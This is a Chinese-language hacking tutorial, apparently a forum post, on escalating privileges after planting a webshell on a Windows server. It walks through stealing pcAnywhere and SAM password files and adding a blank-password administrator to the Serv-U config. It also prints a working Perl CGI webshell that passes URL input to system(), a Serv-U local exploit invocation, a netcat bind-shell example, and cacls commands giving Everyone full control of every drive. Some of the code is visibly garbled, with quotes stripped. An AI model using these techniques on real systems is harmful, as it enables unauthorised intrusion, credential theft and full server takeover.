当我们取得一个webshell时候，下一部要做的就是提升权限
个人总结如下：
1:C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
2.C:\WINNT\system32\config进这里下它的SAM，破解用户的密码
用到破解sam密码的软件有LC，SAMinside
3.C:\DocumentsandSettings\AllUsers\「开始」菜单\程序看这里能跳转不，我们从这里可以获取好多有用的信息
可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转
进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
[USER=WekweN|1]
Password=
HomeDir=c:TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限，然后我们就可以ftp上去quotesiteexecxxx来提升权限

4.c:\winnt\system32\inetsrv\data就是这个目录，同样是erveryone完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行
5.看能否跳转到如下目录
c:\php,用phpspy
c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT,Content-type:text/html\r\n\r\n,27);
$_=$ENV{QUERY_STRING};
s/%20//ig;
s/%2f/\//ig;
$execthis=$_;
syswrite(STDOUT,

\r\n,13);

open(STDERR,>&STDOUT)||dieCan'tredirectSTDERR;
system($execthis);
syswrite(STDOUT,\r\n\r\n,17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行，可以试试pl扩展呢，把刚才的cgi文件改为pl文件，提交http://anyhost//cmd.pl?dir
显示拒绝访问，表示可以执行了！马上提交：先的上传个su.exe(ser-u提升权限的工具)到prel的bin目录
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回：
Serv-u>3.xLocalExploitbyxiaolu
USAGE:serv-u.execommand
Example:serv-u.exenc.exe-l-p99-ecmd.exe
现在是IUSR权限，提交：
http://anyhost//cmd.pl?c\perl\bin\su.execacls.exec:/E/T/Geveryone:F
http://anyhost//cmd.pl?c\perl\bin\su.execacls.exed:/E/T/Geveryone:F
http://anyhost//cmd.pl?c\perl\bin\su.execacls.exee:/E/T/Geveryone:F
http://anyhost//cmd.pl?c\perl\bin\su.execacls.exef:/E/T/Geveryone:F